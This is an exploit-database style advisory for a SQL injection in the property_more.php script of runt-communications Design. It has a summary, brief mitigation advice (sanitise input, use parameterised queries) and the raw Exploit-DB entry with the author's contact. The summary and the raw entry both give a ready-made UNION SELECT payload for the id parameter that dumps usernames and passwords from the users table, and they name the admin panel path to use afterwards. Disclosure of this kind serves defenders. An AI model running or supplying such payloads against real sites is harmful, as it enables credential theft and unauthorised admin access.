runt-communications Design (property_more.php) SQL Injection Vulnerability

vendor:

runt-communications Design

by:

CoBRa_21

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: runt-communications Design

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

runt-communications Design (property_more.php) SQL Injection Vulnerability

An attacker can exploit a SQL injection vulnerability in the runt-communications Design property_more.php script to gain access to the admin panel. The attacker can send a malicious HTTP request to the property_more.php script with an ID parameter set to a value of -9999 union select 0,version(),2,3,group_concat(username,0x3a,password),5,6,7,8,9,10,11 from users. This will allow the attacker to gain access to the admin panel located at http://localhost/[path]/admin.

Mitigation:

Developers should ensure that all user-supplied input is properly sanitized and validated before being used in a SQL query. Additionally, developers should use parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

-------------------------------------------------------------------------------------------

runt-communications Design (property_more.php) SQL Injection Vulnerability

-------------------------------------------------------------------------------------------

Author: CoBRa_21

Mail: uyku_cu@windowslive.com

Script Home: http://runtcommunications.com

-------------------------------------------------------------------------------------------

Sql Injection:

http://localhost/[path]/property_more.php?id=-9999 union select 0,version(),2,3,group_concat(username,0x3a,password),5,6,7,8,9,10,11 from users

Admin Panel

http://localhost/[path]/admin
-------------------------------------------------------------------------------------------